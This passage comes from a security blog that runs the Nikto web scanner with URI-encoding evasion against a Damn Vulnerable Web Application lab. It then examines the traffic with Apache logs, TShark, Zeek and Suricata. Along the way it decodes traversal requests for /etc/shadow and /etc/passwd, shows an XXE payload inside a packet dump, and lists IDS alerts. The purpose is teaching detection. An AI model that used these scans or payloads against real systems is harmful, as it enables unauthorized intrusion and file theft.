User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Connection: Keep-Alive
Host: 10.0.0.106


        187
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 0
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive

Wrapping this up with stream 9.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,9 | grep --perl-regexp "\s+200|s+OK" --before-context=7 --after-context=5
TRACE /./ HTTP/1.0
Trace-Test: Nikto
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Connection: Keep-Alive


        354
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Connection: close
Content-Type: message/http

Nothing of much interest in these logs so far.

Detect - Zeek Analysis

Setup Zeek

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

Once again, focusing only on the requests which were successful.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ grep --perl-regexp '\s+200\s+' http.log                                                                                                                                                                   
1685562364.123858       CQL8E11QNWY25b3JN8      10.0.0.108      42706   10.0.0.106      80      53      GET     10.0.0.106      /./favicon.ico  -       1.1     Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36   -       0       30894   200     OK      -       -       (empty) -       -       -       -       -       -       F4aCd4167hfNQFAJac   -image/x-icon
1685562364.456930       CTvaTF2T3PeQ14SQBj      10.0.0.108      59226   10.0.0.106      80      24      OPTIONS 10.0.0.106      *       -       1.1     Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36   -       0       0       200     OK      -       -       (empty) -       -       -       -       -       -       -       -       -
1685562364.473468       CD9XXK1A6PKuRKepl3      10.0.0.108      59240   10.0.0.106      80      1       TRACE   -       /./     -       1.1     Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36   -       0       194     200     OK      -       -       (empty) -       -       -       -       -       -       -       -       -

No need to dig deeper at this time

Detect - Suricata (IDS) Analysis

Setup Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all

How many unique alerts were generated for this activity?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines
42

What does the top 5 alerts look like?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5
     32 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     27 1:2101201:11] GPL WEB_SERVER 403 Forbidden 
     18 1:2101071:8] GPL WEB_SERVER .htpasswd access 
     16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. 
     13 1:2019526:5] ET WEB_SERVER WEB-PHP phpinfo access

We have seen some of those before. What is this one with "ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY." Peeking into it a bit.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ cat alert-debug.log | grep xxe --before-context=42 | more                                                                                                                                                 
+================
TIME:              05/31/2023-15:46:18.795363
PKT SRC:           wire/pcap
SRC IP:            10.0.0.108
DST IP:            10.0.0.106
PROTO:             6
SRC PORT:          56368
DST PORT:          80
TCP SEQ:           2333024969
TCP ACK:           3679706670
FLOW:              to_server: TRUE, to_client: FALSE
FLOW Start TS:     05/31/2023-15:46:18.675078
FLOW PKTS TODST:   62
FLOW PKTS TOSRC:   59
FLOW Total Bytes:  51064
FLOW IPONLY SET:   TOSERVER: TRUE, TOCLIENT: TRUE
FLOW ACTION:       DROP: FALSE
FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE
FLOW APP_LAYER:    DETECTED: TRUE, PROTO 1
PACKET LEN:        995
PACKET:
 0000  08 00 27 88 B8 34 08 00  27 DB 96 6A 08 00 45 00   ..'..4.. '..j..E.
 0010  03 D5 0F A3 40 00 40 06  12 AB 0A 00 00 6C 0A 00   ....@.@. .....l..
 0020  00 6A DC 30 00 50 8B 0F  22 C9 DB 53 DE 2E 50 18   .j.0.P.. "..S..P.
 0030  01 F5 18 9D 00 00 47 45  54 20 2F 2E 2F 66 6C 65   ......GE T /./fle
 0040  78 32 67 61 74 65 77 61  79 2F 2E 2F 20 48 54 54   x2gatewa y/./ HTT
 0050  50 2F 31 2E 31 0D 0A 63  6F 6E 74 65 6E 74 2D 6C   P/1.1..c ontent-l
 0060  65 6E 67 74 68 3A 20 37  31 34 0D 0A 43 6F 6E 6E   ength: 7 14..Conn
 0070  65 63 74 69 6F 6E 3A 20  4B 65 65 70 2D 41 6C 69   ection:  Keep-Ali
 0080  76 65 0D 0A 55 73 65 72  2D 41 67 65 6E 74 3A 20   ve..User -Agent: 
 0090  4D 6F 7A 69 6C 6C 61 2F  35 2E 30 20 28 57 69 6E   Mozilla/ 5.0 (Win
 00A0  64 6F 77 73 20 4E 54 20  31 30 2E 30 3B 20 57 69   dows NT  10.0; Wi
 00B0  6E 36 34 3B 20 78 36 34  29 20 41 70 70 6C 65 57   n64; x64 ) AppleW
 00C0  65 62 4B 69 74 2F 35 33  37 2E 33 36 20 28 4B 48   ebKit/53 7.36 (KH
 00D0  54 4D 4C 2C 20 6C 69 6B  65 20 47 65 63 6B 6F 29   TML, lik e Gecko)
 00E0  20 43 68 72 6F 6D 65 2F  37 34 2E 30 2E 33 37 32    Chrome/ 74.0.372
 00F0  39 2E 31 36 39 20 53 61  66 61 72 69 2F 35 33 37   9.169 Sa fari/537
 0100  2E 33 36 0D 0A 68 6F 73  74 3A 20 31 30 2E 30 2E   .36..hos t: 10.0.
 0110  30 2E 31 30 36 0D 0A 0D  0A 3C 3F 78 6D 6C 20 76   0.106... .<?xml v
 0120  65 72 73 69 6F 6E 3D 22  31 2E 30 22 20 65 6E 63   ersion=" 1.0" enc
 0130  6F 64 69 6E 67 3D 22 75  74 66 2D 38 22 3F 3E 3C   oding="u tf-8"?><
 0140  21 44 4F 43 54 59 50 45  20 74 65 73 74 20 5B 20   !DOCTYPE  test [ 
 0150  3C 21 45 4E 54 49 54 59  20 78 78 65 20 53 59 53   <!ENTITY  xxe SYS
 0160  54 45 4D 20 22 2F 65 74  63 2F 70 61 73 73 77 64   TEM "/et c/passwd
 0170  22 3E 20 5D 3E 3C 61 6D  66 78 20 76 65 72 3D 22   "> ]><am fx ver="
 0180  33 22 20 78 6D 6C 6E 73  3D 22 68 74 74 70 3A 2F   3" xmlns ="http:/
 0190  2F 77 77 77 2E 6D 61 63  72 6F 6D 65 64 69 61 2E   /www.mac romedia.

Well that is enough peeking for now.


Posted by at No comments:
Labels: , , , , , , ,

Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection

From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.

The Hack -Misconfiguration / Default File" with evasion type 1 -> Random URI encoding (non-UTF8)

Running Nikto with evasion type 1 - Random URI encoding. This time, the attack is "Misconfiguration / Default File". This builds on the previous post.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 1 -evasion 1

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Using Encoding:     Random URI encoding (non-UTF8)
+ Start Time:         2023-05-31 09:17:47 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ /: Retrieved x-powered-by header: PHP/8.0.28.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ // - Redirects (302) to http://10.0.0.106/dashboard/ , Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default IBM TotalStorage server found.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default EMC Cellera manager server is running.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default EMC ControlCenter manager server is running.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Sun Answerbook server running.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default JRun 2 server running.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Cisco VoIP Phone default web server found.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Sybase Jaguar CTS server running.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Lantronix printer found.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default IBM Tivoli Server Administration server is running.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default JRun 4 server running.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Default Lotus Domino server running.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default Sambar install.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default IIS 4.0 install.
+ / - Redirects (302) to http://10.0.0.106/dashboard/ , Appears to be a default Netscape/iPlanet 6 install.
+ /?sc_mode=edit - Redirects (302) to http://10.0.0.106/dashboard/ , Sitecore CMS is installed. This url redirects to the login page.
+ 1466 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-05-31 09:17:54 (GMT-4) (7 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

At first glance, above seems interesting to me. I'm targeting Dam Vulnerable Web Application (DVWA) platform, so I was surprised to see all this guidance about Cisco, EMC, IBM,  etc.

Let's see what we can find via our first step of network forensics.

Detect - Log Analysis

Looking at the first five lines of the access.log file

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ head access.log --lines=5
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET %2f HTTP/1.1" 400 326 "-" "-"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /%63g%69%2e%63%67%69%2f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /%77%65bcg%69%2f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET %2f%63%67i%2d%39%314/ HTTP/1.1" 400 326 "-" "-"
...

Immediately, we see entries such as "/%63g%69%2e%63%67%69%2f". This will need to be decoded. If we copy this into one of our decoding tools, we see this converts to "/cgi.cgi/". With this in mind, do we really wish to copy every entry inside of a tool and decode it?

Let's try to find an easy path to solve this problem. Let's cheat by installing gridsite-clients.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ sudo apt-get install gridsite-clients

With gridsite-clients installed, let's decode.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ urlencode -d "/%63g%69%2e%63%67%69%2f"
/cgi.cgi/

Rather than going through all the entries, like we did above, let's just take a look at the HTTP status codes.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ cat access.log | awk --field-separator='1.1' '{ print $2 }' | \
cut --fields 2 --delimiter ' ' | sort | uniq --count | sort --numeric-sort --reverse                              
    738 400
    677 404
     22 302
     22 
      2 503
      2 403
      2 200
      1 405

With a summary of the status codes, we see 400 and 404 representing the largest amounts. 4xx represents client side errors such as bad request (400) or resource not found (404). There is also 405. This represents the method was not allowed. 5xx represent server side errors. Here see 503. 503 is means the server cannot handle the request. We will focus on the 2 successful (200).

What is that 405 message about method not allowed?! Peeking ...

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ cat access.log | grep "405"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "PUT /n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl HTTP/1.1" 405 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

So we see the attempt to use the put method. Let's decode what is was trying to put.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ urlencode -d "PUT /n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl"
PUT /nikto-test-sNajRVDd.html

Interesting, so Nikto tried to put a file on the server. We assume this failed because we got the message method not allowed.

Looking at the two 200 messages.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ cat access.log | grep --perl-regexp "\s+200\s+"
10.0.0.108 - - [31/May/2023:09:17:22 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:09:17:22 -0400] "TRACE / HTTP/1.1" 200 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Above, the two successes were for OPTIONS method and TRACE methods. It seems there is no further need for us to dig deeper into this log.

Let's peek into the error.log file.

There's a lot in here, I'm going to extract only the items which are core:error

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ cat error.log | grep --perl-regexp '10.0.0.108' | grep "core:error" | grep --perl-regexp '\s+\(.*?\)' --only-matching | cut --fields 2 --delimiter "(" | cut --fields=1 --delimiter=')'
/%2e%2e/..%2f%2e%2e%2f.%2e%2f.%2e/../%2e.%2f%2e.%2f%2e.%2f../%2e.%2f%2e./%65t%63/%73ha%64o%77
/%64a%6ea%2d%6e%61%2f../d%61n%61%2f%68%74%6dl%35a%63%63%2fg%75%61%63a%6d%6fle/%2e%2e/%2e%2e/%2e./.%2e%2f%2e%2e%2f%2e%2e%2fe%74c/%70%61s%73w%64?/d%61na/ht%6dl%35acc/gua%63amo%6ce/

As before, this has to be decoded. Let's build on that output, by leveraging awk.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ cat error.log | grep --perl-regexp '10.0.0.108' | grep "core:error" | \
grep --perl-regexp '\s+\(.*?\)' --only-matching | cut --fields 2 --delimiter "(" | cut --fields=1 --delimiter=')' | \
awk --field-separator='$' '{ system("urlencode -d " $1) }'
/../../../../../../../../../../../../etc/shadow
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

Awesome, we were able to decode via a one-liner. Above shows directory traversal attack looking for /etc/shadow and /etc/passwd. We know these are false positives because the web server is running on Windows. Hence nothing for us to analyze here.

Transitioning to packet analysis.

Detect - Packet Analysis

Setup for packet analysis. Capture packets on ports 80 or 443

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ tshark -n -w tuning_2.pcap -f 'tcp port(80 or 443)' --interface eth0

We know from the log analysis, there were 2 200 messages and 1 405. Let's start with the 405.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ tshark -n -r tuning_2.pcap -Y 'http.response.code == 405' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.stream -E header=y
ip.src  ip.dst  tcp.srcport     tcp.dstport     tcp.stream
10.0.0.106      10.0.0.108      80      43566   11

Digging deeper into this stream. We see the full details of the request and the response.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:43566 | grep 405 --before-context=10 --after-context=7
332
PUT /n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Host: 10.0.0.106
Content-Length: 22
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36

This was a Nikto test.
        608
HTTP/1.1 405 Method Not Allowed
Date: Wed, 31 May 2023 13:17:21 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Allow: POST,OPTIONS,HEAD,GET,TRACE
Content-Length: 321
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for this URL.</p>
<hr>
<address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Server at 10.0.0.106 Port 80</address>
</body></html>

Interestingly, though from above while the PUT method was not allowed, we see the server allows "POST,OPTIONS,HEAD,GET,TRACE". Moving on, nothing else to see with this method.

Looking at the two records where the response code is 200.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ tshark -n -r tuning_2.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.stream -E header=y
ip.src  ip.dst  tcp.srcport     tcp.dstport     tcp.stream
10.0.0.106      10.0.0.108      80      46274   312
10.0.0.106      10.0.0.108      80      46314   315

Looking at stream 312.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:46274 | grep 200 --before-context=8 --after-context=7
193
OPTIONS * HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Connection: Keep-Alive
Host: 10.0.0.106


        187
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 13:17:22 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

Nothing exciting there. Nothing exciting for the TRACE either. 

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:46314 | grep 200 --before-context=8 --after-context=7                                               
TRACE / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Connection: Keep-Alive
Host: 10.0.0.106
Trace-Test: Nikto


        446
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 13:17:22 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: message/http

Nothing much more to do here via packet analysis. There is a lot in the packets but in this scenario, what is the real benefit of looking at 4xx and 5xx errors. If you have a different opinion on the 4xx codes, feel free to share your opinion in the chat.

Detect - Zeek Analysis

Setup Zeek

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

Let's see what can Zeek can tell us. Focusing primarily on the tasks which were successful:

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ cat http.log | grep --perl-regexp '\s+200\s+' | cut --fields 1 --delimiter='-'                                                                                                
1685539068.778266       CfTqVex3giFVuZHr1       10.0.0.108      46274   10.0.0.106      80      2       OPTIONS 10.0.0.106      *
1685539068.802076       CeV6D319VtYt5qKZHf      10.0.0.108      46314   10.0.0.106      80      1       TRACE   10.0.0.106      /

Let's take the UID "CfTqVex3giFVuZHr1" to see where else there is associated activity. 

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ grep "CfTqVex3giFVuZHr1" *.log | cut --fields=1 --delimiter=':' | sort --unique 
conn.log
files.log
http.log

So far, we've worked with the http.log, so there is no surprise that the conn.log file also shows up there. What's in the files.log. Let's go hunting there.

The files.log did not return anything meaningful.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]                                                                                                                                                               
└─$ grep "CfTqVex3giFVuZHr1" files.log 
1685539068.776983       F4eJjh2lgpWOQmofe       CfTqVex3giFVuZHr1       10.0.0.108      46274   10.0.0.106      80      HTTP    0       (empty) text/html       -       0.000000        -       F       297  297      0       0       F       -       -       -       -       -       -       -
1685539068.790150       Fx2Mtn4wvdujHy9u29      CfTqVex3giFVuZHr1       10.0.0.108      46274   10.0.0.106      80      HTTP    0       (empty) text/html       -       0.000000        -       F       326  326      0       0       F       -       -       -       -       -       -       -

Moving on to IDS analysis

Detect - Suricata (IDS) Analysis

Setup Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all

Taking a look at the alerts triggered for this activity. We see there were 37 alerts triggered.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines 
37

Peeking into the top 5 alerts that triggered the most.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5
    122 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
      8 1:2101402:9] GPL EXPLOIT iissamples access 
      7 1:2100977:15] GPL EXPLOIT .cnf access 
      5 1:2101245:13] GPL EXPLOIT ISAPI .idq access 
      4 1:2101129:9] GPL WEB_SERVER .htaccess acces

Nothing more to do here.

Hope you enjoyed the posts in this series:

References:

https://www.urldecoder.net/linux-urldecode
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status
https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PUT
https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS
https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/TRACE

Posted by at No comments:
Labels: , , , , , , ,
Subscribe to: Posts (Atom)